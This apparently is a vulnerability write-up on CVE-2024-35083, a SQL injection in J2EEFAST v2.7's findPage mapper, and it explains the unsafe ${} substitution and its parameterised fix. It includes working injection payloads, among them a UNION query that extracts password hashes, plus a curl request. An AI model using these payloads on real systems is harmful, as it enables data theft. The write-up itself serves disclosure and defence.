CVE-2024-35083 - Exploiting SQL Injection in J2EEFAST v2.7. via findPage Function (SysLoginInfoMapper.xml)

A security vulnerability, CVE-2024-35083, has been discovered in J2EEFAST v2.7., a popular Java-based rapid development framework. The flaw is a SQL injection vulnerability located in the findPage function within the SysLoginInfoMapper.xml file. Attackers can exploit this bug to execute arbitrary SQL statements, potentially gaining unauthorized access to sensitive data or compromising the underlying database.

In this post, we will break down the vulnerability, show simple code snippets, describe how the exploit works, and point to official references.

What is SQL Injection?

SQL Injection (SQLi) occurs when user input is not correctly filtered for SQL statements, allowing attackers to interfere with the queries that an application makes to its database. This can lead to data leaks, data loss, and, in some cases, full control over the application.

The Vulnerable Function: findPage

The vulnerability resides in J2EEFAST v2.7. within the XML mapping file: SysLoginInfoMapper.xml. Specifically, the findPage function dynamically builds SQL queries based on user-provided input, without proper sanitization.

Here’s a (simplified) example of what the code might look like

<!-- SysLoginInfoMapper.xml -->
<select id="findPage" resultType="SysLoginInfo">
  SELECT * 
  FROM sys_login_info 
  WHERE 1=1
  <if test="username != null and username != ''">
    AND username = '${username}'
  </if>
</select>

The key issue here is the use of ${username} (string substitution) instead of #{username} (parameter binding). Using ${} directly inserts user input into the SQL, making it possible to inject malicious SQL code.

How the Attack Works

An attacker can craft a username parameter containing SQL code. For example, if the application receives input like:

username=admin' OR 1=1 --

The resulting SQL would look like this

SELECT *
FROM sys_login_info
WHERE 1=1 AND username = 'admin' OR 1=1 --'

This query always returns all records because OR 1=1 is always true. The -- is a SQL comment, making the rest of the statement ignored.

Suppose a RESTful GET request is used to search logins

GET /api/sysLoginInfo/findPage?username=admin'%20OR%201=1--

Or using curl

curl "http://target-site/api/sysLoginInfo/findPage?username=admin'%20OR%201=1--";

If the application is vulnerable, the response should include all login records.

To extract specific columns (like a password hash), an attacker could use the UNION keyword

username=admin' UNION SELECT password,NULL,NULL,NULL FROM sys_login_info --

To prevent this vulnerability, always use parameterized queries. For example, in MyBatis

<if test="username != null and username != ''">
  AND username = #{username}
</if>

Here, #{username} uses prepared statements, which are safe from injection.

References

- CVE-2024-35083 at NVD
- OWASP SQL Injection
- J2EEFAST Official Site

Conclusion

CVE-2024-35083 is a serious SQL injection vulnerability in J2EEFAST v2.7.. Any web application running this version is at risk unless patched. Attackers can steal, modify, or destroy data with simple HTTP requests. Immediate patching and auditing of XML mappers are critical steps to protect your applications.

Timeline

Published on: 05/23/2024 17:15:30 UTC
Last modified on: 11/04/2024 20:35:06 UTC